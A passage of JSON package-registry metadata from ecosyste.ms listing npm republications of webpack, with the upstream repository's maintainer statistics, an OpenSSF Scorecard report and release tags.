ast_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":363637.6099865047,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":741,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4375,"past_year_avg_comments_per_pull_request":4.864893617021276,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":586,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1081,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":439,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@maialesatanico%2Fwebpack/codemeta","maintainers":[{"uuid":"maialesatanico","login":"maialesatanico","name":null,"email":"maialesatanico@gmail.com","url":null,"packages_count":1,"html_url":"https://www.npmjs.com/~maialesatanico","role":null,"created_at":"2022-11-20T19:14:03.775Z","updated_at":"2022-11-20T19:14:03.775Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/maialesatanico/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":966724,"name":"@gribnoysup/ye-olde-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"gribnoysup","versions_count":1,"first_release_published_at":"2019-08-02T12:21:09.726Z","latest_release_published_at":"2019-08-02T12:21:09.726Z","latest_release_number":"1.12.2","last_synced_at":"2026-09-03T02:55:09.649Z","created_at":"2022-04-07T18:03:22.998Z","updated_at":"2026-09-03T02:55:09.650Z","registry_url":"https://www.npmjs.com/package/@gribnoysup/ye-olde-webpack","install_command":"npm install @gribnoysup/ye-olde-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"1.12.2"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/